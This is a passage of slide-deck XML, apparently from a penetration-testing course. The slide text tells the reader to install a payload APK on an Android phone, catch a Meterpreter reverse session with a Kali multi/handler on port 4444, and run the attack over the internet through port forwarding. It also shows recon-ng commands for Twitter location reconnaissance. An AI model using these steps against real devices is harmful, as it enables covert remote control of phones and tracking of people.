                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Download the singed_jar.apk file and install it with “unknown resources allowed” on the Android device.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1803" name="Google Shape;1803;p260"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3645625" y="1481675"/>
            <a:ext cx="2889900" cy="2910426"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1808" name="Google Shape;1808;p261"/>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809" name="Google Shape;1809;p261"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Then run and install the .apk file.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1810" name="Google Shape;1810;p261"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5421050" y="803225"/>
            <a:ext cx="2895050" cy="4245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3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1111250"/>
            <a:ext cx="8731200" cy="332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root@kali:~# recon-ng</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                      [recon-ng v4.9.4, Tim Tomes (@LaNMaSteR53)]</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[76] Recon modules</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[8]  Reporting modules</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[2]  Import modules</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[2]  Exploitation modules</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[2]  Discovery modules</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[recon-ng][default] &gt; workspaces</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[recon-ng][default]&gt; workspaces create jain</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[recon-ng][jain] &gt; marketplace search </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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[recon-ng][jain] &gt; marketplace install recon/locations-pushpins/twitter</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[recon-ng][jain] &gt; modules load recon/locations-pushpins/twitter</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>THEN WE SET OPTIONS AND RUN</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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FFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </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sp>
        <p:nvSpPr>
          <p:cNvPr id="1815" name="Google Shape;1815;p26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816" name="Google Shape;1816;p262"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After complete installation, we are going back to the Kali machine and start the Meterpreter session.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We already started the multi/handler exploit to listen on port 4444 and local IP address. Open up the multi/handler terminal.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1817" name="Google Shape;1817;p262"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3359075"/>
            <a:ext cx="8124825" cy="1476375"/>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2" name="Google Shape;1822;p26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823" name="Google Shape;1823;p263"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Bingo! We got the Meterpreter session of the Android device. We can check more details with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> command, as mentioned in the below screenshot.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1824" name="Google Shape;1824;p263"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2861650"/>
            <a:ext cx="8124825" cy="1476375"/>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264"/>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830" name="Google Shape;1830;p264"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>There are lots of commands available in Meterpreter. By using the “?” help command, you will see more options that we can perform with an Android device. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We have successfully penetrated the Android device using Kali Linux and penetration testing tools.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>You can also perform this attack on the public network, using a public IP address and a port-forwarding router.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
